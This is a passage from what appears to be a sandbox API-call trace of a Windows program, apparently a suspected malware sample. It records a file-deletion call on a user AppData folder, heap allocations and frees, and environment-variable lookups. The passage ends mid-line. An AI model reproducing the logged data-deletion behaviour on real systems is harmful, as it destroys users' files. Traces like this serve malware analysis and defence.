lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0157.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0157.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0157.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0157.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0157.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0157.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0157.058] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0157.058] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.058] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0157.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0157.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0157.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0157.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0157.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0157.058] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0157.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0157.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.058] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0157.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0157.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0157.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0157.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0157.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0157.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0157.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0157.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0157.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0157.059] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0157.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0157.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0157.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0157.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0157.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0157.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0157.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0157.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0157.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0157.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0157.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0157.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0157.059] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0157.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0157.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0157.059] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0157.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0157.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0157.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0157.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0157.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0157.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0157.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0157.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0157.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0157.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0157.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0157.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0157.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0157.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0157.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0157.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0157.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0157.060] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0157.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0157.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0157.060] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0157.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0157.060] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0157.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0157.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72278 [0157.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0157.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0157.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0157.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0157.060] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0157.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0157.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0157.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0157.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0157.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72338 [0157.061] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0157.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0157.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0157.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa618 [0157.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0157.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0157.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa630 [0157.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0157.061] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0157.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0157.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0157.061] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0157.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0157.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0157.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0157.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0157.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0157.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0157.061] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: 